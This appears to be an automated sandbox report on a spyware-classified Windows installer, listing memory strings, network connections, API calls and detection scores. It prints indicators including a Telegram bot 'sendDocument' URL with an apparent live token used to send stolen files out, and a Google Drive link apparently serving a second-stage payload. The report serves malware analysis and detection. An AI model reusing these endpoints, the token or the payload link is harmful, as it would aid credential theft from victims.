            Source: 14lVOjBoI2.exe, 00000005.00000002.2670933518.000000003658F000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036584000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036792000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036732000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036511000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2649241318.0000000005FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: 14lVOjBoI2.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: 14lVOjBoI2.exe, 00000005.00000002.2670933518.00000000365A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036792000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036732000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897
            Source: 14lVOjBoI2.exe, 00000005.00000003.2246237869.0000000006022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: 14lVOjBoI2.exe, 00000005.00000002.2649241318.0000000005FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: 14lVOjBoI2.exe, 00000005.00000002.2649241318.0000000005FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?
            Source: 14lVOjBoI2.exe, 00000005.00000002.2649241318.0000000005FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1H9-NX9FTfhx7ES6nhfZpdxVzAkPSYSRn
            Source: 14lVOjBoI2.exe, 00000005.00000002.2649241318.000000000601C000.00000004.00000020.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000003.2277509572.0000000006022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: 14lVOjBoI2.exe, 00000005.00000003.2246178651.0000000006022000.00000004.00000020.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2649241318.0000000005FA8000.00000004.00000020.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000003.2277509572.0000000006022000.00000004.00000020.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000003.2246237869.0000000006022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1H9-NX9FTfhx7ES6nhfZpdxVzAkPSYSRn&export=download
            Source: 14lVOjBoI2.exe, 00000005.00000003.2277509572.0000000006022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1H9-NX9FTfhx7ES6nhfZpdxVzAkPSYSRn&export=downloadcn
            Source: 14lVOjBoI2.exe, 00000005.00000003.2277509572.0000000006022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1H9-NX9FTfhx7ES6nhfZpdxVzAkPSYSRn&export=downloadzF
            Source: 14lVOjBoI2.exe, 00000005.00000002.2670933518.000000003658F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: 14lVOjBoI2.exe, 00000005.00000002.2670933518.000000003658F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: 14lVOjBoI2.exe, 00000005.00000002.2670933518.000000003658F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: 14lVOjBoI2.exe, 00000005.00000003.2246237869.0000000006022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: 14lVOjBoI2.exe, 00000005.00000003.2246178651.0000000006022000.00000004.00000020.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000003.2246237869.0000000006022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: 14lVOjBoI2.exe, 00000005.00000003.2246178651.0000000006022000.00000004.00000020.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000003.2246237869.0000000006022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: 14lVOjBoI2.exe, 00000005.00000003.2246178651.0000000006022000.00000004.00000020.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000003.2246237869.0000000006022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: 14lVOjBoI2.exe, 00000005.00000003.2246178651.0000000006022000.00000004.00000020.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000003.2246237869.0000000006022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: 14lVOjBoI2.exe, 00000005.00000003.2246237869.0000000006022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: 14lVOjBoI2.exe, 00000005.00000003.2246237869.0000000006022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: 14lVOjBoI2.exe, 00000005.00000003.2246178651.0000000006022000.00000004.00000020.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000003.2246237869.0000000006022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.9:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49713 version: TLS 1.2
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_392C3D01 NtAllocateVirtualMemory,5_2_392C3D01
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_392C3D40 NtAllocateVirtualMemory,5_2_392C3D40
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_392C3CE0 NtAllocateVirtualMemory,5_2_392C3CE0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004032A0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_00404B300_2_00404B30
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_004070410_2_00407041
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_0040686A0_2_0040686A
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_004070415_2_00407041
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_0040686A5_2_0040686A
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_00404B305_2_00404B30
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_001143285_2_00114328
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_001127B95_2_001127B9
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_00118DA05_2_00118DA0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_00115F905_2_00115F90
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_00112DD15_2_00112DD1
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D758F05_2_38D758F0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D778485_2_38D77848
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D703AF5_2_38D703AF
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7331B5_2_38D7331B
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7CCA05_2_38D7CCA0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7C6385_2_38D7C638
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7F0445_2_38D7F044
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7B07F5_2_38D7B07F
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D769CB5_2_38D769CB
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7C1F25_2_38D7C1F2
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7B9305_2_38D7B930
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7DA895_2_38D7DA89
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D76A435_2_38D76A43
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7EBF75_2_38D7EBF7
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7E3395_2_38D7E339
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7B4EC5_2_38D7B4EC
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7CC8E5_2_38D7CC8E
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7BD885_2_38D7BD88
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7DEE15_2_38D7DEE1
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D76EA05_2_38D76EA0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7E79F5_2_38D7E79F
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D77F095_2_38D77F09
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DCA9B05_2_38DCA9B0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC63685_2_38DC6368
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DCA3605_2_38DCA360
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DCBDF05_2_38DCBDF0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC9D105_2_38DC9D10
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC96C85_2_38DC96C8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC86505_2_38DC8650
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC20F85_2_38DC20F8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC18585_2_38DC1858
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC184C5_2_38DC184C
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC00405_2_38DC0040
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC70705_2_38DC7070
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC70615_2_38DC7061
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC48145_2_38DC4814
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC48205_2_38DC4820
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC29B85_2_38DC29B8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DCA9AF5_2_38DCA9AF
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC29A85_2_38DC29A8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC21085_2_38DC2108
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DCEAF95_2_38DCEAF9
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DCBA975_2_38DCBA97
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC5AB85_2_38DC5AB8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC5AA85_2_38DC5AA8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC32685_2_38DC3268
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC52085_2_38DC5208
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC52075_2_38DC5207
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC43C85_2_38DC43C8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC13F05_2_38DC13F0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC43B95_2_38DC43B9
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DCA35F5_2_38DCA35F
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC63585_2_38DC6358
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC7B4F5_2_38DC7B4F
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC3B185_2_38DC3B18
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC3B085_2_38DC3B08
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DCEB085_2_38DCEB08
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC74C85_2_38DC74C8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC74B85_2_38DC74B8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC1CB05_2_38DC1CB0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC1CA05_2_38DC1CA0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC6C185_2_38DC6C18
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC6C095_2_38DC6C09
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC14005_2_38DC1400
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC4DB05_2_38DC4DB0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC4DB25_2_38DC4DB2
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC25505_2_38DC2550
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC25605_2_38DC2560
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC9D0B5_2_38DC9D0B
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC36C05_2_38DC36C0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC96C35_2_38DC96C3
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC36B05_2_38DC36B0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC56505_2_38DC5650
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC86405_2_38DC8640
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC56605_2_38DC5660
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC2E105_2_38DC2E10
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC67C05_2_38DC67C0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DCAFF85_2_38DCAFF8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DCAFF75_2_38DCAFF7
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DCAFE85_2_38DCAFE8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC67B05_2_38DC67B0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC0FA85_2_38DC0FA8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC3F705_2_38DC3F70
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC3F605_2_38DC3F60
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38DC5F105_2_38DC5F10
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_392CE5C85_2_392CE5C8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_392CD4485_2_392CD448
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_392C73E05_2_392C73E0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: String function: 00402BBF appears 51 times
            Source: 14lVOjBoI2.exe, 00000005.00000002.2649241318.000000000601C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 14lVOjBoI2.exe
            Source: 14lVOjBoI2.exe, 00000005.00000002.2670477424.0000000036337000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 14lVOjBoI2.exe
            Source: 14lVOjBoI2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004032A0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045B4
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetensJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeMutant created: NULL
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeFile created: C:\Users\user\AppData\Local\Temp\nsq6622.tmpJump to behavior
            Source: 14lVOjBoI2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 14lVOjBoI2.exe, 00000005.00000002.2670933518.00000000365F5000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036605000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2671895944.000000003753D000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036634000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036627000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036613000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 14lVOjBoI2.exeReversingLabs: Detection: 55%
            Source: 14lVOjBoI2.exeVirustotal: Detection: 64%
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeFile read: C:\Users\user\Desktop\14lVOjBoI2.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\14lVOjBoI2.exe "C:\Users\user\Desktop\14lVOjBoI2.exe"
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess created: C:\Users\user\Desktop\14lVOjBoI2.exe "C:\Users\user\Desktop\14lVOjBoI2.exe"
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess created: C:\Users\user\Desktop\14lVOjBoI2.exe "C:\Users\user\Desktop\14lVOjBoI2.exe"Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: mswsock.dllJump to behavior
